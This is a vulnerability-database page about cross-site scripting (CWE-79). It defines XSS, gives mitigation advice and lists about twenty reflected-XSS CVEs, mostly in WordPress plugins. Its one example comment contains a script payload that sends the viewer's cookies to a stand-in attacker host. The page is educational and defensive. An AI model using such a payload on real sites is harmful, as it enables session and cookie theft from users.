Fallos del tipo CWE-79

28.633 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-38350MEDIUMspideranalyse <= 0.0.1 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34663MEDIUMjQuery Tagline Rotator <= 0.1.5 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38352MEDIUMFeedify – Web Push Notifications <= 2.1.8 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38321MEDIUMCustom Menu Plugin <= 1.3.3 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38353MEDIUMDropdown and scrollable Text <= 2.0 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34659MEDIUMPlugmatter Pricing Table Lite <= 1.0.32 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34649MEDIUMSimple Behance Portfolio <= 0.2 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38335MEDIUMWise Agent Capture Forms <= 1.0 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34654MEDIUMCustom Post Type Relations <= 1.0 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38354MEDIUMGNU-Mailman Integration <= 1.0.6 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38326MEDIUMPost Title Counter <= 1.1 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34651MEDIUMScribble Maps <= 1.2 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34667MEDIUMCalendar_plugin <= 1.0 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38329MEDIUMDJ EmailPublish <= 1.7.2 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2023-40030MEDIUMMalicious dependencies can inject arbitrary JavaScript into cargo-generated timing reportsEPSS 0.9%CVE-2021-38328MEDIUMNotices <= 6.1 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38334MEDIUMWP Design Maps & Places <= 1.2 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38351MEDIUMOSD Subscribe <= 1.2.3 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38331MEDIUMWP-T-Wap <= 1.13.2 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38348MEDIUMAdvance Search <= 1.1.2 Reflected Cross-Site ScriptingEPSS 0.9%